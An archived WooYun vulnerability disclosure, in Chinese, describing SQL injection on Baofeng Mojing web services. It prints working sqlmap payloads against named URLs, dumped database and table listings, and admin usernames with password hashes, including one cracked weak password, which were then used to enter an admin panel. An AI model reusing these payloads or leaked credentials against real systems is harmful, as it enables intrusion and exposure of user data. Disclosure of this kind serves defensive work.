暴风魔镜某站SQL注入(涉及魔镜15W用户)

2017年4月24日17:23:12评论404 views字数 215阅读0分43秒阅读模式

摘要

2016-04-23：细节已通知厂商并且等待厂商处理中
2016-04-25：厂商已经确认，细节仅向厂商公开
2016-05-05：细节向核心白帽子及相关领域专家公开
2016-05-15：细节向普通白帽子公开
2016-05-25：细节向实习白帽子公开
2016-06-09：细节向公众公开

漏洞概要关注数(20) 关注此漏洞

缺陷编号： WooYun-2016-199716

漏洞标题：暴风魔镜某站SQL注入(涉及魔镜15W用户)

漏洞作者： mango

提交时间： 2016-04-23 17:08

公开时间： 2016-06-09 11:00

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：注射技巧

0人收藏

漏洞详情

披露状态：

简要描述：

恩~~能送眼镜么~~

详细说明：

先从第一个注入说起~

http://pay.mojing.cn:80/api/getvideo.php?version=3.00.1221.2211

注入参数version

code 区域

Parameter: version (GET)
     Type: stacked queries
     Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
     Payload: version=3.00.1221.2211');(SELECT * FROM (SELECT(SLEEP(5)))OIqa)#
 ---
 web application technology: Nginx, PHP 5.4.26
 back-end DBMS: MySQL 5.0.11
 available databases [2]:
 [*] information_schema
 [*] mj_resource

code 区域

Database: mj_resource
 [18 tables]
 +----------------------------------------+
 | mjadmin_device_manage                  |
 | mjadmin_friend_share_active_rule       |
 | mjadmin_friend_share_first_div_docconf |
 | mjadmin_homepage                       |
 | mjadmin_jump_manage                    |
 | mjadmin_resource_bootimage             |
 | mjadmin_resource_category              |
 | mjadmin_resource_desc                  |
 | mjadmin_resource_video                 |
 | mjadmin_style_manage                   |
 | mjadmin_updatemsg                      |
 | permissions                            |
 | resources                              |
 | roles                                  |
 | sessions                               |
 | user_autologin                         |
 | user_profiles                          |
 | users                                  |
 +----------------------------------------+

然后注入users

code 区域

Database: mj_resource
 Table: users
 [3 entries]
 +----+------------+---------------------------------------------+
 | id | username   | password                                    |
 +----+------------+---------------------------------------------+
 | 1  | linzanxian | $P$BrFvzTV2JBgPLCNmPJD8jJKQS3K/bO.          |
 | 30 | zhaochao   | $P$BLip9mEXmm5xixZQWWhHOxYcdlYUhv/ (123456) |
 | 31 | tanliang   | $P$B1saiOyVL.YIiLhhoJNnrTULyITIqY.          |
 +----+------------+---------------------------------------------+

拿到一个zhaochao的账户~但是不知道后台 pay和mpay域名的后台都打不开~没办法继续看看~

对所有域名进行目录爆破发现mj域名可以打开admin

就尝试使用zhaochao账户成功登陆

然后就想是不是这个后台会存有注入呢~ 尝试搜索

发现http://mj.mojing.cn:80/admin/score/list?status=&uid=1&nickname=1&content=1&begin_score=1&end_score=4&res_type=&res_id=1&res_name=1&begin_create_time=2016-03-30+13%3A56%3A05&end_create_time=2016-04-23+13%3A56%3A07&excel=0

参数 res_id存在问题(其他的没测试)

code 区域

---
 Parameter: res_id (GET)
     Type: boolean-based blind
     Title: MySQL >= 5.0 boolean-based blind - Parameter replace
     Payload: status=&uid=1&nickname=1&content=1&begin_score=1&end_score=4&res_type=&res_id=(SELECT (CASE WHEN (1924=1924) THEN 1924 ELSE 1924*(SELECT 1924 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&res_name=1&begin_create_time=2016-03-30 13:56:05&end_create_time=2016-04-23 13:56:07&excel=0
 
     Type: stacked queries
     Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
     Payload: status=&uid=1&nickname=1&content=1&begin_score=1&end_score=4&res_type=&res_id=1;(SELECT * FROM (SELECT(SLEEP(5)))jGyK)#&res_name=1&begin_create_time=2016-03-30 13:56:05&end_create_time=2016-04-23 13:56:07&excel=0
 
     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
     Payload: status=&uid=1&nickname=1&content=1&begin_score=1&end_score=4&res_type=&res_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))VzLq)&res_name=1&begin_create_time=2016-03-30 13:56:05&end_create_time=2016-04-23 13:56:07&excel=0
 ---
 web application technology: PHP 5.4.26
 back-end DBMS: MySQL 5.0
 available databases [3]:
 [*] information_schema
 [*] modou
 [*] mojing

mojing是这个后台的数据库

注入出root用户登录试试

那么modou呢~

code 区域

Database: modou
 [34 tables]
 +---------------------------------+
 | action_yurenjie                 |
 | app_check_token_log             |
 | bad_word                        |
 | feedback                        |
 | mcode_link_unique               |
 | md_batch                        |
 | md_consume                      |
 | md_consume_advance              |
 | md_friend_share_float_div_limit |
 | md_friend_share_limit           |
 | md_mcode                        |
 | md_mcode_task_log               |
 | md_pre_consume                  |
 | md_pre_user                     |
 | md_recharge                     |
 | md_recharge_callback_log        |
 | md_res_score                    |
 | md_sdk_coupon                   |
 | md_sdk_modou                    |
 | md_sdk_token                    |
 | md_unique_voucher               |
 | md_user                         |
 | md_user_mp3_combination_code    |
 | md_user_res_score               |
 | md_user_res_to_app              |
 | md_user_upload_mp3              |
 | md_verify                       |
 | md_voucher                      |
 | md_voucher_cost_log             |
 | md_xcode                        |
 | mj_conference_stat              |
 | mj_conference_statlog           |
 | mojing_user_2                   |
 | user_modou                      |
 +---------------------------------+

其中mojing_user_2 引起我注意我尝试注入几条数据

看这应该是魔镜APP的用户吧~

漏洞证明：

大概有15W的用户

修复方案：

全都是时间盲注~~真不容易！！！！跑了我一个周末的时间！！！！累死了~有礼物嘛~

版权声明：转载请注明来源 mango@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：5

确认时间：2016-04-25 10:51

厂商回复：

感谢您提交的漏洞，我们会尽快修复。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-04-23 18:35 | 西西 ( 普通白帽子 | Rank:1074 漏洞数:281 | 工欲善其事，必先利其器。)

0

又得改密码。

1# 回复此人
2016-04-23 21:22 | Azox佐熙 ( 路人 | Rank:1 漏洞数:1 | 我就混个脸熟)

0

老子刚注册你就给日了

2# 回复此人
2016-04-23 21:54 | Mazing ( 路人 | Rank:27 漏洞数:7 )

0

又得改密码。

3# 回复此人
2016-04-24 00:35 | Time_泽~少 ( 路人 | Rank:13 漏洞数:9 | 计算机专业/网络安全技术)

0

这，又得改密码勒

4# 回复此人
2016-04-24 09:42 | prolog ( 普通白帽子 | Rank:944 漏洞数:197 )

0

这，又得改密码勒

5# 回复此人
2016-05-05 09:00 | Nelion ( 实习白帽子 | Rank:89 漏洞数:39 | 老实，腼腆，潜力股；不谈情，不说爱，只泡...)

0

这，又得改密码勒

6# 回复此人
2016-06-09 15:21 | Icebreaker ( 路人 | Rank:12 漏洞数:3 | 方向比努力重要，能力比知识重要，健康比成...)

0

这，又得改密码勒

7# 回复此人

漏洞概要 关注数(20) 关注此漏洞

缺陷编号： WooYun-2016-199716

漏洞标题： 暴风魔镜某站SQL注入(涉及魔镜15W用户)

相关厂商： mojing.cn

漏洞作者： mango

提交时间： 2016-04-23 17:08

公开时间： 2016-06-09 11:00

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 20

漏洞状态： 厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 注射技巧

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 mango@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(20) 关注此漏洞

漏洞标题：暴风魔镜某站SQL注入(涉及魔镜15W用户)

危害等级：高

漏洞状态：厂商已经确认

Tags标签：注射技巧

漏洞评价(共0人评价):

登陆后才能进行评分